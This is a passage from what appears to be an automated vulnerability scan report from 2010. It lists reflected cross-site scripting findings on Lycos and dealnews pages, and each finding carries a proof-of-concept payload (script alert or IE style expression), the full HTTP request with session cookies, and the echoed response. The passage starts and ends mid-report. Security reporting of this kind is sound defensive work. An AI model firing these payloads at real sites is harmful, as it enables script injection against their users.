3.23. http://classifieds.lycos.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16eb4"><script>alert(1)</script>b6c9dd0275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?16eb4"><script>alert(1)</script>b6c9dd0275a=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:27:17 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:27:17 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25333
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/?16eb4"><script>alert(1)</script>b6c9dd0275a=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be8c4<script>alert(1)</script>c1799e733f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html HTTP/1.1 Host: dealnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:24 GMT Server: Apache X-Powered-By: PHP/5.2.13-pl0-gentoo Status: 404 Not Found Set-Cookie: LOLSESS=bn9ub373pc8q8p5g75cf8jgjion1rvnd; expires=Sun, 09-Jan-2011 14:27:24 GMT; path=/; domain=.dealnews.com Content-Length: 1074 Connection: close Content-Type: text/html; charset=utf-8
<html><head><title>File Not Found</title> <style> body, td { font-family: Arial; font-size: 10pt; } a:link { color: #30309A; } a:visited { color: #1f2e62; } </style></head><body><div align="center" st ...[SNIP]... <p>The page you've requested, "http://dealnews.com/lwbe8c4<script>alert(1)</script>c1799e733f/artclick.html", no longer exists or has moved to a new location. If you're unable to find what you were looking for, please contact the <a href="/contact.html"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be84f<script>alert(1)</script>75d2f5468e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html?2,414584,1328790,eref=lycos HTTP/1.1 Host: dealnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 14:27:27 GMT Server: Apache X-Powered-By: PHP/5.2.13-pl0-gentoo Status: 404 Not Found Set-Cookie: LOLSESS=9es4l9sjbia99svl89q5o3e327nsldmu; expires=Sun, 09-Jan-2011 14:27:27 GMT; path=/; domain=.dealnews.com Content-Length: 1075 Connection: close Content-Type: text/html; charset=utf-8
<html><head><title>File Not Found</title> <style> body, td { font-family: Arial; font-size: 10pt; } a:link { color: #30309A; } a:visited { color: #1f2e62; } </style></head><body><div align="center" st ...[SNIP]... <p>The page you've requested, "http://dealnews.com/lwbe84f<script>alert(1)</script>75d2f5468e6/artclick.html", no longer exists or has moved to a new location. If you're unable to find what you were looking for, please contact the <a href="/contact.html"> ...[SNIP]...
3.26. http://deals.lycos.com/coupons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 656f6"style="x:expression(alert(1))"bdfcf5416e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /coupons?656f6"style%3d"x%3aexpression(alert(1))"bdfcf5416e5=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:03 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:03 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 42968
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&656f6"style="x:expression(alert(1))"bdfcf5416e5=1"> ...[SNIP]...
3.27. http://deals.lycos.com/deals [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9bb70"style="x:expression(alert(1))"b6416fcc52e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals?9bb70"style%3d"x%3aexpression(alert(1))"b6416fcc52e=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46657
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals?pn=2&9bb70"style="x:expression(alert(1))"b6416fcc52e=1"> ...[SNIP]...
3.28. http://deals.lycos.com/deals/category/automotive-238 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/automotive-238
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff964"style="x:expression(alert(1))"467fcf726ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/automotive-238?ff964"style%3d"x%3aexpression(alert(1))"467fcf726ca=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:31 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 43897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&ff964"style="x:expression(alert(1))"467fcf726ca=1"> ...[SNIP]...
3.29. http://deals.lycos.com/deals/category/cameras-167 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/cameras-167
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e0b4"style="x:expression(alert(1))"76383e47512 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/cameras-167?2e0b4"style%3d"x%3aexpression(alert(1))"76383e47512=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47261
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&2e0b4"style="x:expression(alert(1))"76383e47512=1"> ...[SNIP]...
3.30. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/clothing-and-accessories-202
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c906"style="x:expression(alert(1))"2a42ce649cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/clothing-and-accessories-202?2c906"style%3d"x%3aexpression(alert(1))"2a42ce649cd=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:32 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:33 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47737
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&2c906"style="x:expression(alert(1))"2a42ce649cd=1"> ...[SNIP]...
3.31. http://deals.lycos.com/deals/category/computer-39 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/computer-39
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6c7a"style="x:expression(alert(1))"5a17236f13a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/computer-39?e6c7a"style%3d"x%3aexpression(alert(1))"5a17236f13a=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:34 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e6c7a"style="x:expression(alert(1))"5a17236f13a=1"> ...[SNIP]...
3.32. http://deals.lycos.com/deals/category/digital-cameras-168 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/digital-cameras-168
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688cc"style="x:expression(alert(1))"fbe0d430e89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/digital-cameras-168?688cc"style%3d"x%3aexpression(alert(1))"fbe0d430e89=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:27 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47869
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&688cc"style="x:expression(alert(1))"fbe0d430e89=1"> ...[SNIP]...
3.33. http://deals.lycos.com/deals/category/electronics-142 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/electronics-142
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as daf23"style="x:expression(alert(1))"a3aefb6c21b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/electronics-142?daf23"style%3d"x%3aexpression(alert(1))"a3aefb6c21b=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:39 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:39 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 49068
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&daf23"style="x:expression(alert(1))"a3aefb6c21b=1"> ...[SNIP]...
3.34. http://deals.lycos.com/deals/category/gaming-and-toys-186 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/gaming-and-toys-186
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e037e"style="x:expression(alert(1))"f64d12d06a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/gaming-and-toys-186?e037e"style%3d"x%3aexpression(alert(1))"f64d12d06a2=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:30:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:00 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&e037e"style="x:expression(alert(1))"f64d12d06a2=1"> ...[SNIP]...
3.35. http://deals.lycos.com/deals/category/health-and-beauty-228 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/health-and-beauty-228
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b70e3"style="x:expression(alert(1))"c8c79da67d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/health-and-beauty-228?b70e3"style%3d"x%3aexpression(alert(1))"c8c79da67d5=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:12 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&b70e3"style="x:expression(alert(1))"c8c79da67d5=1"> ...[SNIP]...
3.36. http://deals.lycos.com/deals/category/home-and-garden-196 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://deals.lycos.com
Path:
/deals/category/home-and-garden-196
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b6e"style%3d"x%3aexpression(alert(1))"da228453765 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15b6e"style="x:expression(alert(1))"da228453765 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/category/home-and-garden-196?15b6e"style%3d"x%3aexpression(alert(1))"da228453765=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
